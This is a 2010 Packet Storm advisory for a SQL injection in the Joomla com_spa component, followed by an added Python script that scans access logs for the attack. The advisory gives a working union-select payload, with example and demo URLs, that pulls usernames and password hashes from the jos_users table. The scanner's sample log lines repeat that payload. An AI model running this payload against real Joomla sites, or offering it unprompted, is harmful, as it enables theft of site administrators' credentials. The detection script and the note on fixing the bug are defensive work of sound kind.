Joomla SPA SQL Injection

2010-07-18T00:00:00
ID PACKETSTORM:91942
Type packetstorm
Reporter Palyo34
Modified 2010-07-18T00:00:00

Description

                                        
===================================================
Joomla Component (com_spa) SQL Injection Vulnerability
===================================================

Author : Palyo34 & KroNicKq

Homepage : http://www.1923turk.com

===================================================

[+] Vulnerable File :

http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]

[+] ExploiT :

-1+union+select concat(username,0x3a,password)+from+jos_users

[+] Example :

http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users

[+] Demo :

http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users

===================================================
I Love You Joomla :))
===================================================

Greetz : 1923Turk All Users
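A detection check for the request pattern in this advisory, added here as an example and not part of the original advisory or the component's code: it flags com_spa requests whose cid parameter is not a plain integer. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A legitimate cid is a plain non-negative integer id; anything else is suspicious.
INT_RE = re.compile(r'^\d+$')
# Keywords taken from the payload shown in the advisory, used only to grade severity.
SQLI_RE = re.compile(r'\b(union|select|concat|from)\b|jos_users', re.I)


def check_line(line):
    """Return (client, cid, severity) for a suspicious com_spa request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes and maps '+' to a space, so encoded payloads are normalised.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[-1].lower() != "com_spa":
        return None
    for cid in params.get("cid", []):
        if INT_RE.match(cid):
            continue
        severity = "sqli" if SQLI_RE.search(cid) else "non-numeric"
        return (client, cid, severity)
    return None


def scan(lines):
    """Run check_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(check_line, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2010:10:00:01 +0000] "GET /index.php?option=com_spa&view=spa_product&cid=7 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [18/Jul/2010:10:00:05 +0000] "GET /index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users HTTP/1.1" 200 812',
    '198.51.100.23 - - [18/Jul/2010:10:00:09 +0000] "GET /index.php?option=com_spa&view=spa_product&cid=-1%20UNION%20SELECT%201 HTTP/1.1" 200 640',
    '192.0.2.44 - - [18/Jul/2010:10:00:12 +0000] "GET /index.php?option=com_spa&view=spa_product&cid=12%27 HTTP/1.1" 500 300',
    '192.0.2.10 - - [18/Jul/2010:10:00:15 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, cid, severity in scan(SAMPLE_LOG):
        print(f"{severity:12} {client:15} cid={cid!r}")
```

The check only surfaces attempts in logs; the fix for this class of bug is for the component to cast cid to an integer or bind it as a query parameter before it reaches the SQL statement.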